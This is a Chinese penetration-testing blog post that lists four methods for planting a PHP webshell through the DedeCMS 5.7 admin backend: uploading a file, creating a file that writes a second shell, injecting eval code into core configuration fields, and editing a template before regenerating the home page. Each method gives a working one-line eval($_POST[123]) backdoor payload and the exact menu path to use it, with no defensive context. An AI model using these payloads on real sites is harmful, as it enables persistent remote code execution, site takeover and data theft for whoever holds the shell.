我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
文章目录
- 一、织梦dedecms5.7后台 getwebshell
- 1、方法1:上传文件
- 2、方法2:新建文件
- 3、方法3:编辑核心配置文件
- 4、方法4:编辑模板-->更新页面
一、织梦dedecms5.7后台 getwebshell
1、方法1:上传文件
(1)进入后台:模块---->文件管理器---->上传文件---->shell.php,内容为<?php phpinfo();eval($_POST[123]);?>
(2)访问:\shell.php
2、方法2:新建文件
(1)进入后台:模块---->文件管理器---->新建文件---->写入wshell.php,内容为<?php fputs(fopen('shell0.php','w'),'<?php phpinfo();eval(\$_POST[123]);?>');?>
(2)访问:\wshell.php
(3)访问:\shell0.php
3、方法3:编辑核心配置文件
(1)进入后台:系统---->系统基本参数---->核心配置---->专题最大的节点数或FTP端口写入${eval($_POST[123])}
(2)访问:data\config.cache.inc.php
4、方法4:编辑模板–>更新页面
(1)进入后台:模板---->默认模板管理---->index.html的末尾加上<?php phpinfo();eval($_POST[123]);?>
(2)生成---->更新主页HTML---->主页模板默认选择default\index.html---->主页位置填入…\shell00.php–>勾选生成静态---->点击更新主页HTML
(3)访问:\shell00.php
更多推荐
120.网络安全渗透测试—[CMS后台 getwebshell]—[织梦dedecms5.7后台 getwebshell]
发布评论